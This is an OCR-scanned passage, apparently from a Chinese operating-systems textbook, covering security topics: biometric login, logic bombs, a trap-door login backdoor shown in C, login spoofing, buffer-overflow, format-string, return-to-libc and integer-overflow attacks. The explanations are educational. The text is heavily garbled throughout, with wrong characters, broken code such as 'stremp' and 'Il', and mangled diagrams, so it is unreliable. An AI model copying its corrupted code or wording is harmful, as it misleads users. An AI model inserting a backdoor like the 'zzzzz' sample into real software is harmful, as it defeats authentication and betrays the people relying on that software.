我 们 可 以 继续 给 出 许多 例子 ,但 是 有 两 个 例子 特别 有 助 于 我 们 理 
解 。 猫 和 其 他 一 些 动物 通过 小 便 来 划 定 目 己 的 地 盘 。 很 明显 ， 猫 通过 
这 种 方法 可 以 相互 识别 目 己 的 家 。 BEA a A MEITAKI 
析 的 狐 置 ， 那 么 他 就 可 以 建立 识别 样本 。 每 个 终 站 都 可 以 有 这 样 的 法 
E, RAME- RIA: “要 登录 系统 ， 请 留 下 样本 。” 这 也 许 是 一 
个 绝对 无 法 攻破 的 系统 ， 但 用 户 可 能 难以 接受 使 用 这 样 的 系统 。 


在 使 用 指纹 识别 效 置 和 小 型 谱 仪 时 也 可 能 发 生 同 样 的 情况 。 用 户 
会 被 要 求 按 下 大 拇指 并 抽取 一 滴 血 进行 化 验 分 析 。 问 题 在 于 任何 验证 
识别 系统 对 用 户 来 说 应 该 从 心理 上 是 可 接受 的 。 手 指 长 度 识 别 也 许 不 
会 引起 什么 麻烦 ， 但 是 类 似 于 在 线 存 储 指纹 等 方式 虽然 碱 少 了 入 侵 的 


可 能 ， 但 对 大 多 数 人 来 说 是 不 可 接受 的 。 因 为 他 们 将 指纹 和 犯人 联系 
在 一 起 。 


9.5 内 部 攻击 


前 几 节 对 于 用 户 认证 工作 原理 的 一 些 细节 问题 已 经 有 所 讨论 。 不 
幸 的 是 ， 阻 止 不速之客 登录 系统 仅仅 是 众多 安全 问题 中 的 一 个 。 另 一 
个 完全 不 同 的 领域 可 以 被 定义 为 “内 部 攻击 ”(inside jobs) ， 内 部 攻击 
由 一 些 公司 的 编程 人 员 或 使 用 这 些 受 保护 的 计算 机 、 编 制 核心 软件 的 
员工 实施 。 来 目 内 部 攻击 与 外 部 攻击 的 区 别 在 于 ， 内 部 攻击 者 拥有 外 
部 人 员 所 不 具备 的 专业 知识 和 访问 权限 。 下 面 我 们 将 给 出 一 些 内 部 攻 
击 的 例子 ， 这 些 攻 击 方式 曾经 非常 频繁 地 出 现在 公司 中 。 根 据 攻击 
者 、 被 攻击 者 以 及 攻击 者 想 要 达到 的 目的 这 三 方面 的 不 同 ， 每 种 攻击 
都 具有 不 同 的 特点 。 


9.5.1 逻辑 炸弹 


在 软件 外 包 盛 行 的 时 代 ， 程 序 员 总 是 很 担心 他 们 会 失去 工作 ， 有 
时 候 他 们 甚至 会 采取 菏 些 措施 来 减轻 这 种 担心 。 对 于 感受 到 失业 威胁 
的 程序 员 ， 编 写 逻 辑 炸弹 (logic bomb) 就 成 为 了 一 种 策略 。 这 一 装置 
征 菜 些 公 司 程序 员 〈 当 前 被 雇用 的 ) 写 的 程序 代码 ， 并 被 秘密 地 放 入 
产品 的 操作 系统 中 。 只 要 程序 员 每 天 输入 口令 ， 产 品 吏 相 安 无 事 。 但 
征 一 旦 程序 员 被 突然 解雇 并 受 无 警告 地 被 要 求 离开 时 ， 第 二 天 (或 第 
二 周 ) 逻辑 炸弹 就 会 因 得 不 到 口令 而 发 作 。 当 然 也 可 以 在 逻辑 炸弹 里 


设置 多 个 变量 。 一 个 非常 有 名 的 例子 是 : 逻辑 炸弹 每 天 核对 薪水 册 。 
如 果 某 程序 员 的 工 号 没有 在 连续 两 个 发 薪 日 中 出 现 ， 逻 辑 炸 弹 就 发 作 
了 (Spafford 等 人 ,1989) 。 


逻辑 炸弹 发 作 时 可 能 会 欣 去 磁盘 ， 随 机 删除 文件 ， 对 核心 程序 做 
难以 发 现 的 改动 ， 或 者 对 原始 文件 进行 加 密 。 在 后 面 的 例子 中 ， 公 司 
对 是 否 要 叫 警 察 带 走 放置 逻辑 炸弹 的 员工 进退 两 难 (报警 存在 着 导致 
数 月 后 对 该 员工 宣判 有 徘 的 可 能 ， 但 却 无 法 恢复 丢失 的 文件 ) 。 或 者 
屈服 该 员工 对 公司 的 融 诈 ， 将 其 重新 座 用 为 “顾问 ”来 避免 如 同 天 文 数 
字 般 的 补救 ， 并 依 此 作为 解决 问题 的 交换 条 件 (公司 也 同时 期 望 他 不 
会 再 放置 新 的 逻辑 炸弹 ) 。 


在 很 多 有 记录 的 案例 中 ， 病 毒 癌 被 其 感染 的 计算 机 中 植 入 逻辑 炸 
弹 。 一 般 情况 下 ， 这 些 逻 辑 炸 弹 被 设计 为 在 未 来 的 某 个 时 间 “ 爆 炸 ”。 
然而 ， 由 于 程序 员 无 法 预知 那 一 台 计 算 机 将 会 被 攻击 ， 因 此 逻辑 炸弹 
无 法 用 于 保护 目 己 不 失业 ， 也 无 法 用 户 勒 索 。 这 些 逻 辑 炸 弹 通常 会 被 
设 定 为 在 政治 上 有 重要 意义 的 日 子 爆 炸 ， 因 此 它们 也 称 做 时 间 炸 弹 


(time bomb) 。 


9.5.2 Jal KBH 


男 一 个 由 内 部 人 员 造 成 的 安全 漏洞 是 后 门 陷阱 (trap door) 。 这 一 
问题 是 由 系统 程序 员 跳 过 一 些 通常 的 检测 并 插入 一 段 代码 造成 的 。 如 
程序 员 可 以 在 登录 程序 中 插入 一 小 段 代码 ， 让 所 有 使 用 “zzzzz” 登 录 名 
的 用 户 成 功 登 录 而 无 论 密 码 文 件 中 的 密码 是 什么 。 正 常 的 程序 代码 如 
图 9-22a 所 示 。 改 成 后 门 陷阱 程序 的 代码 如 图 9-22b 所 示 。strcmp 这 行 代 
码 的 调用 是 为 了 判断 登录 名 是 否 为 “zzzzz”。 如 果 是 ， 则 无 论 输 入 了 什 
么 密码 都 可 以 登录 。 如 果 后 门 陷 阱 被 程序 员 放 入 到 计算 机 生产 商 的 产 
品 中 并 球 洋 过 海 ， 那 么 程序 员 日 后 就 可 以 任意 登录 到 这 家 公司 生产 的 
计算 机 上 ， 而 无 论 谁 拥 有 它 或 密码 是 什么 。 后 门 陷阱 程序 的 实质 古 它 
跳 过 了 正常 的 认证 过 程 。 


while (TRUE) { while (TRUE) { 
printf(“login: "); printf("login: "); 
get_string(name); get_string(name); 
disable_echoing( ); disable_echoing( ); 
printf("password: "); printf("password: "); 
get_string(password); get_string(password); 
enable_echoing( ); enable_echoing( ); 
v = check_validity(name, password); v = check_validity(name, password); 
if (v) break; if (v Il stremp(name, "zzzzz") == 0) break; 


} } 
execute_shell(name); execute_shell(name); 


a) b) 


图 9-22 a) 正 第 的 代码 ;，b) 插 入 了 后 | 门 陷阱 的 代码 


对 公司 来 说 ， 防 止 后 门 的 一 个 方法 是 把 代码 审查 (code review) 作 
为 标准 惯例 来 执行 。 通 过 这 一 技术 ， 一 旦 程序 员 完 成 对 某 个 模块 的 编 
写 和 测试 后 ， 该 模块 被 放 入 代码 数据 库 中 进行 检验 。 开 发 小 组 里 的 所 
有 程序 员 周 期 性 地 聚会 ， 每 个 人 在 小 组 面前 向 大 家 解释 每 行 代码 的 售 
义 。 这 样 做 不 仅 增 加 了 找 出 后 门 代码 的 机 会 ， 而 且 增 加 了 大 家 的 员 任 
感 ， 被 抓 出 来 的 程序 员 也 知道 这 样 做 会 损害 目 己 的 职业 生涯 。 如 果 该 
建议 遭 到 了 太 多 的 反对 ， 那 么 让 两 个 程序 员 相互 检查 代码 也 是 一 个 可 
行 的 方法 。 


95.3 ”登录 其 骗 


这 种 内 部 攻击 的 实施 者 是 系统 的 合法 用 户 ， 然 而 这 些 合法 用 户 却 
试图 通过 登录 欺骗 的 手段 获取 他 人 的 密码 。 这 种 攻击 通常 发 生 在 一 个 
具有 大 量 多 用 户 公 用 计算 机 的 局 域 网 内 。 很 多 大 学 束 有 可 以 供 学 生 使 
用 的 机 房 ， 学 生 可 以 在 任意 一 台 计 算 机 上 进行 登录 。 登 录 欺 骗 (login 
spoofing) 。 它 是 这 样 工作 的 : 通常 当 没 有 人 登录 到 UNIX 终 端 或 局 域 
网 上 的 工作 站 时 ， 会 显示 如 图 9-23a 所 示 的 屏幕 。 当 用 户 坐 下 来 输入 登 
录 名 后 ， 系 统 会 要 求 输入 口令 。 如 果 口 令 正确 ， 用 户 就 可 以 登录 并 启 
动 shell (也 有 可 能 是 GUI) 程序 。 


现在 我 们 来 看 一 看 这 一 情 帮 。 一 个 恶意 的 用 户 Mal 写 了 一 个 程序 
可 以 显示 如 图 9-23b 所 示 的 图 像 。 除 了 内 部 没有 运行 登录 程序 外 ， 它 看 
上 去 和 9-23a 惊 人 的 相似 ， 这 不 过 十 蚤 人 。 现 在 Mal 局 动 了 他 的 程序 ， 
便 可 以 躲 在 远 处 看 好 戏 了 。 当 用 户 坐 下 来 输入 登录 名 后 ， 程 序 要 求 输 
入 口令 并 屏蔽 了 啊 应 。 随 后 ， 登 录 名 和 口令 后 被 写 入 文件 并 发 出 信和 号 
有 要求 系统 结束 shell 程 序 。 这 使 得 Mal 能 够 正常 退出 登录 并 触发 真正 的 登 
录 程 序 ， 如 图 9-23a 所 示 。 好 像 是 用 户 出 现 了 一 个 拼写 错误 并 要 求 再 次 
登录 ， 这 时 真正 的 登录 程序 开始 工作 了 。 但 与 此 同时 Mal 又 得 到 了 男 
一 对 组 合 (登录 名 和 口令 ) 。 通 过 在 多 个 终端 上 进行 登 示 欺 蚤 ， 入 侵 
者 可 收集 到 多 个 口令 。 


图 9-23 a) 正 确 的 登录 屏幕 ，b) 假 冒 的 登录 屏幕 


防止 登录 欺骗 的 惟一 实用 的 办 法 是 将 登录 序列 与 用 户 程序 不 能 捕 
捉 的 键 组 合 起 来 。Windows 为 此 目的 采用 了 Cal-Alt-Del。 如 采用 户 坐 
在 终端 前 开始 按 Ctrl-Alt-Del， 当 前 用 户 就 会 被 注销 并 启动 新 的 登录 程 
序 。 没 有 任何 办 法 可 以 跳 过 这 一 步 。 


9.6 利用 代码 漏洞 


前 面 已 经 介绍 了 内 部 人 员 是 如 何 危害 系统 安全 的 ， 在 本 节 中 ,我 
们 将 介绍 外 部 人 员 (outsider) 〈 主 要 通过 互联 网 ) 对 操作 系统 进行 攻 
击 和 破坏 的 方式 。 几 乎 所 有 的 攻击 机 制 都 利用 了 操作 系统 或 定 被 广泛 
使 用 的 软件 (如 正 浏 览 器 和 微软 Office) 中 的 漏洞 。 一 种 典型 的 攻击 形 
成 方式 是 ， 有 人 发 现 了 操作 系统 中 的 一 个 漏洞 ， 接 着 发 现 如 何 利 用 该 
漏洞 攻击 计算 机 。 


每 一 种 攻击 都 涉及 特定 程序 中 的 特定 漏洞 ， 其 中 利用 某 些 反复 出 
现 的 漏洞 展开 的 攻击 值得 我 们 学 习 。 在 本 世 中 ， 我 们 将 研究 一 些 攻 击 
的 工作 原理 ， 由 于 本 书 的 核心 是 操作 系统 ， 因 此 重点 将 放 在 如 何 攻 击 
操作 系统 上 ， 而 利用 系统 和 软件 漏洞 对 网 页 和 数据 库 的 攻击 方式 本 万 
都 没有 涉及 。 


有 很 多 方式 可 以 对 漏洞 进行 利用 ， 在 一 种 直接 的 方法 中 ， 攻 击 考 
会 启动 一 个 脚本 ， 该 脚本 按 顺序 进行 如 下 活动 : 


TD) 运行 目 动 端口 扫 朱 ， 以 查找 接受 远程 连接 的 计算 机 。 


2) 壬 试 通过 猜测 用 户 名 和 密码 进行 登录 。 


3) 一 旦 登录 成 功 ， 则 启动 特定 的 具有 漏洞 的 程序 ， 并 产生 输入 使 得 
程序 中 的 漏洞 被 触发 。 
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4) 如 果 该 程序 运行 SETUID 到 root， 则 创建 一 个 SETUID root shell ° 


5) 局 动 一 个 僵尸 程序 ， 监 听 卫 端口 的 指令 。 


6) 对 目标 机 器 进行 配置 ， 确 保 该 僵尸 程序 在 系统 每 次 重新 启动 后 都 


会 自动 运行 。 


上 述 脚 本 可 能 会 运行 很 长 时 间 ， 但 是 它 有 很 可 能 最 终 成 功 。 攻 击 
者 确保 只 要 目标 计算 机 重新 启动 时 ， 僵 尸 程序 也 启动 ， 束 使 得 这 人 台 计 
算 机 一 直 被 控制 。 


男 一 种 常用 的 攻击 方式 利用 了 已 经 感染 病毒 的 计算 机 ， 在 该 计算 
机 登录 到 其 他 机 器 的 时 候 ， 计 算 机 中 的 病毒 局 动 目标 机 费 中 的 着 洞 程 
Fe 〈 就 像 上 面 提 到 的 脚本 一 样 ) 。 基 本 上 只 有 第 一 步 和 第 二 步 与 上 述 
脚本 文件 不 同 ， 其 他 步 又 仍然 适用 。 不 论 哪 种 方法 ， 攻 击 者 的 程序 总 
征 要 在 目标 机 器 中 运行 ， 而 该 机 器 的 所 有 者 对 该 恶意 程序 一 无 所 知 。 


96.1 A Kitna 


之 所 以 有 如 此 多 的 攻击 是 因为 操作 系统 和 其 他 应 用 程序 都 是 用 C 语 
言 写 的 《因为 程序 员 喜 欢 它 ， 并 且 用 它 来 进行 有 效 的 编译 ) 。 但 遗憾 


的 是 ， 没 有 一 个 C 编 译 器 可 以 做 到 数组 边界 检查 。 如 下 面 的 代码 虽然 并 
不 合法 ， 但 系统 却 没 有 进行 检验 : 

int I; 

char c[1024]; 

1i=12000; 

c[i]=0; 

结果 内 存 中 有 10 976 TEE THAE, FPA a RES BE 
险 的 后 果 。 在 运行 时 没有 进行 任何 检查 来 避免 这 种 情况 。 


C 语 言 的 属性 导致 了 下 列 攻击 。 在 图 9-24a 中 ， 我 们 看 到 主 程序 在 
运行 时 局 部 变量 是 放 在 栈 里 的 。 在 某 些 情况 下 ， 系 统 会 调用 过 程 A， 如 
图 9-24b 所 示 。 标 准 的 调用 步骤 是 把 返回 地 址 (指向 调用 语句 之 后 的 指 
令 ) 压 入 栈 ， 然 后 将 程序 的 控制 权 交 给 A， 由 A 不 断 减少 栈 指针 地 址 来 
分 配 本 地 变量 的 存储 空间 。 


虚拟 地 址 空间 虚拟 地 址 空间 虚拟 地 址 空间 


OxFFFF... 主 程序 的 
ely HN ; 主 程序 的 主 程序 的 
so 局 部 变量 pe 局 部 变量 局 部 变量 
堆栈 _> 
ts 
指针 返回 地 返回 地 址 
A 的 局 部 A 的 局 部 x 
变量 变量 《和 
SP 一 SP 一 ~ 


缓冲 区 B 


c) 


a) 


Al 9-24 al 主 程序 运行 时 的 情况 ; D) 调 用 过 程 A 后 的 情况 ; OO 灰色 字 
体 表 示 的 缓冲 海 出 


假设 过 程 A 的 任务 是 得 到 完整 的 路 径 (可 能 是 把 当前 目录 路 径 和 文 
件 名 串联 起 来 ) ， 然 后 打开 文件 实施 一 些 操作 。A 拥 有 固定 长 度 的 缓冲 
区 (如 数组 ) B， 它 存放 着 文件 名 ， 如 图 9-24b 所 示 。 使 用 定 长 缓冲 区 
存放 文件 名 比 起 先 检测 实际 大 小 再 动态 分 配 空间 要 容易 得 多 。 如 果 组 
冲 区 只 有 1024 个 字 节 ， 那 么 能 够 放 得 下 所 有 的 文件 名 吗 ? 特别 是 当 操 
作 系统 把 文件 名 的 长 度 限制 (或 者 更 好 的 是 对 全 路 径 名 的 长 度 限制 ) 
在 不 超过 255 (或 其 他 固定 的 长 度 ) 个 字符 时 。 


PRT, ERARA BAIRR BE pe bk TP K20007F 
字符 的 文件 名 ， 在 使 用 时 束 会 出 错 ， 但 攻击 者 却 不 予 理 会 。 当 过 程 A 把 
文件 名 复制 到 缓冲 区 时 ， 文 件 名 洲 出 并 禾 盖 了 图 9-24c 的 灰色 部 分 。 更 
Ae, WARM EK, Ea mR Hh, MAS WEAR 
时 ， 返 回 地 址 是 从 文件 名 的 中 间 和 截取 的 。 如 条 这 一 地 址 是 随机 数 ， 系 
统 将 跳 到 该 随机 地 址 ， 并 可 能 引起 一 系列 的 误 操 作 。 


但 旦 如 采 文 件 名 没有 包 侣 某 些 随机 地 址 会 怎么 样 呢 ? WIRE AS 
的 是 有 效 的 二 进 制 地 址 并 且 设 计 得 十 分 吻合 某 个 过 程 的 起 始 地 址 ， 那 
ZEAE? 例如 吻合 过 程 B 的 起 始 地 址 。 如 采 真 是 这 样 ， 那 么 当 过 
程 A 运 行 结束 后 ， 过 程 B 就 开始 运行 。 实 际 上 ， 攻 击 者 会 用 他 的 恶意 代 
码 来 覆盖 内 存 中 的 原 有 代码 ， 并 且 让 这 些 代 码 被 执行 。 


同样 的 技巧 还 运用 于 文件 名 之 外 的 其 他 场合 。 如 用 在 对 较 长 的 环 
境 变 量 串 、 用 户 输 入 或 任何 程序 员 创 建 了 定 长 缓冲 区 并 需要 用 户 输入 
变量 的 场合 。 通 过 手工 输入 一 个 含有 运行 程序 的 串 ， 就 有 可 能 将 这 段 
程序 装 入 到 栈 并 让 它 运 行 。C 语 言 画 数 库 的 gets 函 数 可 以 把 (未 知 大 小 
的 ) 串 变 量 读 入 定 长 的 缓冲 区 里 ， 但 并 不 校 验 是 否 液 出 ， 这 样 就 很 容 
易 遗 受 攻击 。 有 些 编 详 器 甚至 通过 检查 gets 的 使 用 来 发 出 警告 。 


现在 我 们 来 讨论 最 坏 的 部 分 。 假 设 被 攻击 的 UNIX 程 序 的 SETUID 
为 root 或 在 Windows 里 拥有 管理 员 权 限 的 程序 ) ， 被 插入 的 代码 可 以 
进行 两 次 系统 调用 ， 把 攻击 者 磁盘 里 的 shell 文 件 的 权限 改 为 SETUID 
root 的 权限 ， 这 样 当 程序 运行 时 攻击 者 就 拥有 了 超级 用 户 的 权限 。 或 
者 ， 攻 击 者 可 以 映射 进 一 个 特定 的 共享 文件 库 ， 从 而 实施 各 种 各 样 的 
破坏 。 还 可 以 十 分 容易 地 通过 exec 系 统 调 用 来 覆盖 当前 shell 中 运行 的 程 
序 ， 并 利用 超级 用 户 的 权限 建立 新 的 shell 。 


更 糟 的 是 ， 亚 意 代码 可 以 通过 互联 网 下 载 程序 或 脚本 ， 并 将 其 存 
储 在 本 地 磁盘 上 。 此 后 该 恶意 代码 就 可 以 创建 一 个 进程 直接 从 本 地 运 
行 恶 意 程 序 或 是 脚本 。 该 进程 可 以 一 直 监 听 IP 端 口 ， 从 而 等 待 攻击 者 
的 命令 ， 这 将 目标 机 器 变 为 僵尸 。 恶 意 代 码 必 须 保 证 每 次 机 器 启动 
后 ， 恶 意 程 序 或 脚本 可 以 被 启动 ， 然 而 不 论 在 Windows 或 所 有 版 本 的 


绝 大 多 数 系统 安全 问题 都 与 缓冲 区 溢出 漏洞 相关 ， 而 这 类 漏洞 很 
难 被 修复 ， 因 为 已 有 的 大 量 C 代 码 都 没有 对 绥 促 区 淤 出 进行 检查 。 


9.6.2 ”格式 化 字符 串 攻 击 


尽管 很 多 程序 员 都 是 很 好 的 打字 员 ， 但 事实 上 他 们 都 不 愿意 打 
字 。 将 变量 名 reference_count 缩 写 为 rc 表达 了 相同 的 意思 ， 却 可 以 在 每 
次 使 用 该 变量 的 时 候 减 少 了 13 个 字符 的 输入 ， 对 程序 员 来 说 何 乐 而 不 
为 呢 ? 然而 这 种 偷懒 行为 在 下 面 接 述 的 情况 中 ， 却 可 能 导致 系统 灾难 
PES A Yo ° 


考虑 下 面 的 C 程 序 代 码 片段 ， 该 段 代 码 打 印 了 一 段 欢 迎 信息 : 


serie Arey leads 

在 这 段 代 码 声明 了 一 个 字符 指针 类 型 的 变量 s， 该 变量 被 初始 化 指 
癌 一 个 字符 串 “Hello World”， 注 意 在 这 个 字符 串 的 末尾 有 一 个 额外 的 
字符 和 0 用 以 标记 该 字符 串 的 结束 。 函 数 printf 被 传 入 两 个 参数 ， 其 中 
格式 化 字符 串 “%s” 指 定 系统 接 下 来 打印 的 是 一 个 字符 串 ， 第 二 个 参数 
则 告诉 printf 该 字符 串 的 起 始 地 址 。 当 被 执行 的 时 候 ， 这 段 代 码 会 在 屏 
幕 上 打印 出 *Hello Wond”〈 在 任何 标准 输出 中 ， 都 可 以 成 功 执行 ) 


但 是 ， 如 果 程 序 员 懒 惰 地 将 上 述 代码 段 写 为 : 


char *s="Hello World"; 
printf(s); 


这 样 调用 printf 是 合法 的 ， 因 为 printf 具 有 可 变 个 数 的 参数 ， 其 中 第 
一 个 参数 必须 是 格式 化 字符 串 (Format String) ， 当 然 不 包括 任何 格 
式 信息 (如 “%s”) 的 字符 串 也 是 允许 的 ， 所 以 尽管 第 二 种 编程 风格 并 
不 推荐 ,但 在 这 里 并 不 会 出 问题 ， 而 且 它 还 使 得 程序 员 少 融 了 五 个 按 
键 ， 似 乎 是 不 错 的 改进 。 


6 个 月 以 后 ， 其 他 程序 员 有 要求 对 这 段 代 码 进行 修改 ， 首 移 询 问 用 户 
的 姓名 ， 在 对 该 用 尸 发 出 特定 的 欢迎 信息 。 在 草率 阅读 完 原 先 的 代码 
后 ， 该 程序 员 只 做 了 一 点 改变 : 


char s[100],g[100]="Hello";/* 声 明 数 组 So 和 g， 并 初始 化 g*/ 
gets(s);/* 从 键盘 读 取 字符 串 ， 存 放 到 数组 s 中 */ 
strcat(g,s);/* 把 s 连 接 到 g 的 末尾 */ 

printf(g);/* 输 出 g*/ 


这 段 代码 首先 将 用 户 输 入 的 字符 串 存 入 s， 然 后 将 s 连 接 到 已 经 被 
初始 化 的 字符 种 g 之 后 ， 以 在 g 中 形成 最 终 的 输出 信息 。 到 现在 这 种 方 
式 依然 能 够 正确 地 显示 结果 (gets 函 数 很 容易 遭受 缓冲 区 洲 出 攻击 ， 
然而 由 于 其 便于 书写 ， 因 此 到 现在 依然 流行 ) 


然而 ， 如 果 一 个 对 C 语 言 有 所 了 解 的 用 户 看 到 了 这 段 代码 ， 他 会 
立刻 意识 到 程序 从 键 一 输入 的 并 不 只 是 一 个 商 单 的 字符 串 ， 而 是 一 个 
格式 化 字符 串 (Format String) ， 因 此 任何 格式 化 标识 符 都 会 起 作 
用 。 尽 管 绝 大 多 数 格式 化 标识 符 都 规范 了 输出 〈 例 如, “9%s”: 打印 一 
个 字符 串 ; “Sod”: 打印 一 个 十 进 制 整 数 ) ， 有 一 些 却 比较 特殊 。 符 别 


是“9%n"， 它 不 打印 出 任何 信息 ， 而 是 计算 直到 “9%n" 出 现 之 前 ， 总 共 打 
印 了 多 少 字 符 ， 并 且 将 这 个 数字 保存 到 printf 下 一 个 将 要 使 用 的 参数 中 
去 。 下 面 给 出 一 个 使 用 “%n” 的 例子 : 


int main(int argc,char *argv[]) 


int i=0; 

printf("Hello%nworld\n", 性) ;/* 把 %n 前 出 现 的 字符 个 数 保存 到 变量 i 中 */ 
printf("i=%d\n",i);/*i MEN (EA6*/ 

} 


当 这 段 代码 被 编译 运行 后 ， 输 出 为 : 


Hello World 
i=6 


注意 到 ij 的 值 在 函数 printf 中 以 一 种 很 不 显眼 的 方式 被 修改 了 。 这 种 
特性 只 在 极 少数 情况 下 有 用 ， 它 意味 着 打印 一 个 格式 化 字符 串 可 能 导 
致 一 个 单词 (或 者 很 多 单词 ) 被 存储 在 内 存 中 。 很 显然 让 printf 具 有 这 
样 的 特性 并 不 是 一 个 好 主意 ， 然 而 这 个 功能 在 当时 看 来 是 非常 方便 
的 。 绝 大 多 数 软 件 的 弱点 都 是 因此 而 存在 。 


束 像 我 们 刚刚 看 到 的 一 样 ， 由 于 程序 员 对 程序 不 严 齐 的 修改 ， 可 
能 导致 用 户 有 了 输入 格式 化 字符 串 的 机 会 。 而 打印 一 个 格式 化 字符 串 
可 能 导致 内 存 被 重 写 (overwrite) ， 这 就 为 覆盖 栈 中 printf 函 数 的 返回 
地 址 提供 了 一 种 方法 ， 通 过 重 写 这 个 返回 地 址 ， 可 以 使 得 函数 在 printf 


函数 返回 时 跳 到 任何 位 置 ， 例 如 跳 到 刚刚 输入 的 格式 化 字符 串 。 这 种 
攻击 方式 叫做 格式 化 字符 串 攻 击 (format string attack) ° 


一 旦 用 户 可 以 修改 内 存 并 强制 程序 跳 转 到 一 段 新 注 入 的 代码 段 ， 
这 上段 代码 就 具有 了 被 攻击 程序 所 拥有 的 所 有 权限 。 如 果 该 程序 是 
SETUID root， 那 么 攻击 者 就 可 以 创建 一 个 具有 root 权 限 的 shell。 实 现 
这 种 攻击 的 具体 细节 过 于 复杂 ， 本 书 不 表 痪 述 。 这 里 只 想 让 读者 知 
道 ， 格 式 化 字符 串 攻 击 是 一 个 严重 的 问题 。 如 果 读 者 在 Google 搜 索 栏 
中 输入 “format string attack”《〈 格 式 化 字符 串 攻 击 ) ， 会 找到 很 多 的 相 
关 信息 。 


另外 ， 值 得 一 所 的 是 ， 在 本 节 的 例子 中 ， 采 用 定 长 字符 数组 也 很 
容易 遭受 缓冲 区 淤 出 攻击 。 


9.6.3 ”返回 libc 攻 击 


缓冲 区 海 出 攻击 和 格式 化 字符 串 攻 击 都 要 求 癌 栈 中 加 入 必要 的 数 
据 ， 并 将 函数 返回 的 地 址 指 同 这 些 数据 。 一 种 防止 这 种 攻击 的 方法 是 
设 定 栈 页 面 为 读 / 写 权限 ， 而 不 是 执行 权限 。 虽 然 大 多 数 操作 系统 都 一 
定 不 文 持 这 个 功能 ， 但 现代 的 “奔腾 ”CPU 可 以 做 到 这 一 点 。 还 有 一 种 攻 
击 在 栈 不 能 被 执行 的 条 件 下 也 能 奏效 ， 这 就 是 返回 libc 攻 击 (return to 


libc attack) œ 


假设 一 个 缓冲 区 溢出 攻击 或 格式 化 字符 串 攻 击 成 功 修改 了 当前 玫 
数 的 返回 地 址 ， 但 是 无 法 执行 栈 中 的 攻击 代码 ， 那 么 还 能 否 通过 修改 
当前 函数 的 返回 地 址 到 指定 位 置 来 实现 攻击 昵 ? 答案 是 肯定 的 。 儿 乎 
所 有 的 C 程 序 连 接 了 libc 库 (通常 该 库 为 共享 的 ， 这 个 库 包 括 了 C 程 序 
几乎 所 有 的 关键 函数 ， 其 中 的 一 个 束 古 strcpy。 该 函数 将 一 个 任意 长 度 
的 字符 串 从 任意 地 址 复制 到 另 一 地 址 。 这 种 攻击 的 本 质 是 欺骗 strcpy 画 
数 将 恶意 程序 (通常 是 共享 的 ) 复制 到 数据 段 并 在 那里 执行 。 


下 面 让 我 们 观察 这 种 攻击 实现 的 具体 细节 。 在 图 9-25a 中 ， 画 数 { 在 
main 函 数 中 被 调用 ， 形 成 图 中 的 栈 。 我 们 假设 这 个 程序 在 超级 用 户 的 
权限 下 运行 (AN, SETUID root) ， 并 且 存 在 漏洞 使 得 攻击 者 可 以 将 目 
已 的 shellcode 注 入 到 内 存 中 ， 如 图 9-25b 所 示 。 此 时 这 段 代 码 在 栈 顶 ， 
因此 无 法 被 执行 。 


虚拟 地 址 空间 虚拟 地 址 空间 


主 程序 局 部 变量 


主 程序 局 部 变量 


strcpy 的 返回 地 址 
strcpy 的 地 址 


返回 地 址 


F 的 局 部 变量 


F 的 局 部 变量 
栈 指 针 pene 


图 9-25 al 攻击 之 前 的 栈 ，b) 被 重 写 之 后 的 栈 


除了 将 shellcode 放 到 栈 顶 ， 攻 击 者 还 需要 重 写 图 9-25b 中 阴影 部 分 
的 四 个 字 。 这 四 个 字 的 最 低地 址 之 前 保存 了 该 画 数 的 返回 地 址 (返回 
到 main) ， 但 现在 它 保存 的 是 strcpy 函 数 的 地 址 ， 所 以 当 {f 返 回 的 时 候 ， 
它 实 际 上 进入 了 strcpy。 在 strcpy 中 ， 栈 指针 将 会 指 癌 一 个 伪造 的 返回 
地 址 ， 该 函数 完成 后 会 利用 该 地 址 返回 。 而 这 个 伪造 的 返回 地 址 所 指 
向 的 ， 就 是 攻击 者 注入 shellcode 的 地 址 。 在 返回 地 址 之 上 的 两 个 字 分 别 
是 strcpy 函 数 执行 复制 操作 的 源 地 址 和 目的 地 址 。 当 strcpy 画 数 执行 完 
毕 ，shellcode 被 复制 到 可 执行 的 数据 段 ， 同 时 strepy 范 数 返 回 到 
shellcode 处 。shellcode 此 时 具有 被 攻击 程序 所 有 的 权限 ， 它 为 攻击 者 创 


建 一 个 shell， 并 开始 监听 一 些 了 端口 ， 等 竺 来 自 攻击 者 的 命令 。 从 此 刻 
起 ， 这 人 台 机 器 变 成 了 僵尸 机 器 (zombie) ， 可 以 被 用 来 发 送 垃圾 邮件 
或 者 发 起 “拒绝 服务 攻击 ” (denial-of-service attack) ° 


9.6.4 Baar th NE 


计算 机 进行 定 长 整 型 数 的 运算 ， 整 型 数 的 长 度 一 般 有 8 位 、16 位 、 
32 位 和 64 位 。 如 果 相 加 或 相 乘 的 结果 超过 了 整 型 数 可 以 表示 的 最 大 
值 ， 整 称 洲 出 发 生 了 。C 程 序 并 不 会 捕捉 这 个 错误 ， 而 是 会 将 错误 的 
结果 存储 下 来 并 继续 使 用 。 一 种 特别 的 情况 是 ， 当 变量 为 有 符号 整数 
时 ， 两 个 整数 相 加 或 想 成 的 结果 可 能 因为 洲 出 而 成 为 负数 。 如 末 变 量 
古 无 符号 整数 ， 淆 出 的 结 采 依然 是 整数 ， 不 过 会 围绕 0 和 最 大 值 进行 循 
环 (wrap around) 。 例 如 ， 两 个 16 位 无 符号 整数 的 值 都 是 40 000， 如 
果 将 其 相 乘 的 结果 存 入 另 一 个 一 个 16 位 的 无 符号 整 型 变量 中 ， 其 结果 


将 会 是 4096。 


由 于 这 种 洲 出 不 会 被 检测 ， 因 此 可 能 被 用 作 攻 击 的 手段 。 一 种 方 
式 就 是 给 程序 传 入 两 个 合法 的 (但 是 非常 大 ) 的 参数 ， 它 们 的 和 或 乘 
积 将 导致 盗 出。 例如， 一 些 图 形 程序 要 求 通过 命令 行 传 入 图 像 文件 的 
高 和 宽 ， 以 便 对 输入 的 图 像 进 行 大 小 转换 。 如 采 传 入 的 高 度 和 宽度 会 
导致 面积 的 “ 洲 出 ”程序 束 会 错误 地 计算 存储 图 像 所 需要 的 内 存 空 
间 ， 从 而 可 能 申请 一 块 比 实际 小 得 多 的 内 存 。 至 此 缓冲 区 盗 出 攻击 的 
时 机 已 经 成 熟 。 对 于 有 符号 整 型 数 ， 也 可 以 采用 相似 的 办 法 进行 攻 
T 


9.6.5 ”代码 注入 攻击 


使 得 目标 程序 执行 它 所 不 期 望 的 代码 是 一 种 攻击 形式 。 比 如 有 时 
